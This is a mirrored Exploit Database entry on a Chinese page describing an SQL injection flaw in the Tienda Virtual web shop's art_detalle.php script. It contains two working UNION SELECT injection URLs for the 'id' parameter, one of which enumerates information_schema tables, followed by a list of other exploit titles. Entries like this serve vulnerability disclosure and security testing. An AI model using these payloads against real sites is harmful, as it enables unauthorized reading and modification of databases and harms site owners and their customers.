Tienda Virtual – ‘art_detalle.php’ SQL Injection

Exploit Database
119 阅读

作者： Arturo Zamora

日期： 2012-01-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36486/

source: https://www.securityfocus.com/bid/51240/info

Tienda Virtual is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

The following example URIs are available:

http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--

http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--

last Exploits
Tienda Virtual – ‘art_detalle.php’ SQL Injection的更多信息

PBBoard CMS 3.0.1 – SQL Injection：
FreePBX 2.11.0 – Remote Command Execution：
Education Website Script – Authentication Bypass：
WordPress Plugin WP Publication Archive 2.0.1 – ‘file’ Information Disclosure：
ManageEngine opManager 12.3.150 – Authenticated Code Execution：
Joomla! Component com_community – ‘userid’ SQL Injection：
WordPress Plugin Download Monitor – ‘dlsearch’ Cross-Site Scripting：
Jobscript4Web 4.5 – Authentication Bypass：